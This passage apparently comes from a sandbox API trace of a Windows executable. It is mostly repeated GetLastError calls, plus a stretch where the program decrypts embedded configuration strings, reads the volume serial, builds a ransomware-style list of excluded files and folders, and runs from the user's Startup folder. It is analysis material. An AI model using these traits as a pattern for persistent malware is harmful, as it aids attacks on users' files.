GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.306] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.307] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4978, Size=0x38c) returned 0x2cb4978 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.308] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.309] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.310] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.311] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] GetLastError () returned 0x0 [0134.338] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x86) returned 0x2cb4d10 [0134.338] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4d10, Size=0x92) returned 0x2cb4d10 [0134.338] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1a) returned 0x2cb4638 [0134.338] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcd4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd3c | out: phKey=0xd6fd3c*=0x1327658) returned 1 [0134.338] CryptSetKeyParam (hKey=0x1327658, dwParam=0x1, pbData=0xd6fd24, dwFlags=0x0) returned 1 [0134.338] CryptDecrypt (in: hKey=0x1327658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1270, pdwDataLen=0xd6fcf0 | out: pbData=0x2cb1270, pdwDataLen=0xd6fcf0) returned 1 [0134.338] CryptDestroyKey (hKey=0x1327658) returned 1 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1298 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb12c0 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb13c0 [0134.339] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd14 | out: phKey=0xd6fd14*=0x1326f18) returned 1 [0134.339] CryptSetKeyParam (hKey=0x1326f18, dwParam=0x1, pbData=0xd6fcfc, dwFlags=0x0) returned 1 [0134.339] CryptDecrypt (in: hKey=0x1326f18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13c0, pdwDataLen=0xd6fcc8 | out: pbData=0x2cb13c0, pdwDataLen=0xd6fcc8) returned 1 [0134.339] CryptDestroyKey (hKey=0x1326f18) returned 1 [0134.339] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13c0 | out: hHeap=0x2cb0000) returned 1 [0134.339] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1298, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.339] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12c0 | out: hHeap=0x2cb0000) returned 1 [0134.339] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1270 | out: hHeap=0x2cb0000) returned 1 [0134.339] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xd6fd7c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xd6fd7c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.339] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1298 | out: hHeap=0x2cb0000) returned 1 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb1270 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb12a0 [0134.339] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcb8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd20 | out: phKey=0xd6fd20*=0x1327658) returned 1 [0134.339] CryptSetKeyParam (hKey=0x1327658, dwParam=0x1, pbData=0xd6fd08, dwFlags=0x0) returned 1 [0134.339] CryptDecrypt (in: hKey=0x1327658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12a0, pdwDataLen=0xd6fcd4 | out: pbData=0x2cb12a0, pdwDataLen=0xd6fcd4) returned 1 [0134.339] CryptDestroyKey (hKey=0x1327658) returned 1 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x60) returned 0x2cb13c0 [0134.339] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd18 | out: phKey=0xd6fd18*=0x1327218) returned 1 [0134.339] CryptSetKeyParam (hKey=0x1327218, dwParam=0x1, pbData=0xd6fd00, dwFlags=0x0) returned 1 [0134.339] CryptDecrypt (in: hKey=0x1327218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13c0, pdwDataLen=0xd6fccc | out: pbData=0x2cb13c0, pdwDataLen=0xd6fccc) returned 1 [0134.339] CryptDestroyKey (hKey=0x1327218) returned 1 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x56) returned 0x2cb1428 [0134.339] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb1428, Size=0xaa) returned 0x2cb1428 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb12b8 [0134.339] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x180) returned 0x2cb4410 [0134.339] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc80, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce8 | out: phKey=0xd6fce8*=0x1327598) returned 1 [0134.339] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fcd0, dwFlags=0x0) returned 1 [0134.339] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0xd6fc9c | out: pbData=0x2cb4410, pdwDataLen=0xd6fc9c) returned 1 [0134.339] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x220) returned 0x2cb4660 [0134.340] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce0 | out: phKey=0xd6fce0*=0x1327598) returned 1 [0134.340] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fcc8, dwFlags=0x0) returned 1 [0134.340] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4660, pdwDataLen=0xd6fc94 | out: pbData=0x2cb4660, pdwDataLen=0xd6fc94) returned 1 [0134.340] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4598 [0134.340] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb8 | out: phKey=0xd6fcb8*=0x13273d8) returned 1 [0134.340] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0xd6fca0, dwFlags=0x0) returned 1 [0134.340] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4598, pdwDataLen=0xd6fc6c | out: pbData=0x2cb4598, pdwDataLen=0xd6fc6c) returned 1 [0134.340] CryptDestroyKey (hKey=0x13273d8) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x84) returned 0x2cb4888 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x84) returned 0x2cb4db0 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4e40 [0134.340] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fc90 | out: phKey=0xd6fc90*=0x1327598) returned 1 [0134.340] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fc78, dwFlags=0x0) returned 1 [0134.340] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4e40, pdwDataLen=0xd6fc44 | out: pbData=0x2cb4e40, pdwDataLen=0xd6fc44) returned 1 [0134.340] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4e40 | out: hHeap=0x2cb0000) returned 1 [0134.340] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2cb4888, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4db0 | out: hHeap=0x2cb0000) returned 1 [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4598 | out: hHeap=0x2cb0000) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb4918 [0134.340] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb4 | out: phKey=0xd6fcb4*=0x1327598) returned 1 [0134.340] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fc9c, dwFlags=0x0) returned 1 [0134.340] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4918, pdwDataLen=0xd6fc68 | out: pbData=0x2cb4918, pdwDataLen=0xd6fc68) returned 1 [0134.340] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x18) returned 0x2cb12d0 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x18) returned 0x2cb4940 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4598 [0134.340] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fc8c | out: phKey=0xd6fc8c*=0x1327198) returned 1 [0134.340] CryptSetKeyParam (hKey=0x1327198, dwParam=0x1, pbData=0xd6fc74, dwFlags=0x0) returned 1 [0134.340] CryptDecrypt (in: hKey=0x1327198, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4598, pdwDataLen=0xd6fc40 | out: pbData=0x2cb4598, pdwDataLen=0xd6fc40) returned 1 [0134.340] CryptDestroyKey (hKey=0x1327198) returned 1 [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4598 | out: hHeap=0x2cb0000) returned 1 [0134.340] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2cb12d0, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4940 | out: hHeap=0x2cb0000) returned 1 [0134.340] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4918 | out: hHeap=0x2cb0000) returned 1 [0134.340] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4db0 [0134.341] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4fc8 [0134.341] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb4fc8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.341] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4fc8 | out: hHeap=0x2cb0000) returned 1 [0134.341] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x174) returned 0x2cb4fc8 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.341] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.342] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.343] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.344] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x21c) returned 0x2cb5148 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.345] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.346] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.347] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] 